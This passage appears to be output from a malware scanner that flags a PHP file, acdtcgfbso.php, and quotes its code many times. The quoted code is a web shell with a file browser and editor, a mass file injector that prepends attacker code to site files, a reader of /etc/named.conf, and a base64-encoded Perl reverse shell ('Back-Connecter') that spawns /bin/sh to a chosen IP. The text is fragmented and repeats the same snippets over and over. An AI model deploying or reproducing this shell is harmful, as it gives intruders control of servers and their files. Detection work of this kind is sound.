0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33file_get_contents was found in the file acdtcgfbso.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33fopen was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose(326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfbfwrite was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File 277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894fclose was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '<font color='green'>Edit File Done.</font><br />'; }else{ echo '<font color='red'>Edit File Error.</font><br />'; } fclose($_ba2773181c57); } echo '<form method='POST'>277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose($_84c54f971273);?><br><br>326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dfile_get_contents was found in the file acdtcgfbso.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33fopen was found in the file acdtcgfbso.php 211: </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $_ba2773181c57 = fopen($_POST['path'],'w'); if(fwrite($_ba2773181c57,$_POST['src'])){ echo '277: $_5eb61fd12eed = $_POST['file_name'];$_0adc62b31334 = $_POST['content_of_files'];if (isset($_POST['file_name']) || isset($_POST['content_of_files']) || isset($_POST['submissionoffilecreator'])) {if (!empty($_5eb61fd12eed) || !empty($_0adc62b31334)) {$_84c54f971273 = @fopen($_5eb61fd12eed, 'w');@fwrite($_84c54f971273, $_0adc62b31334);@fclose(326: if (isset($_GET['back_connecter'])) 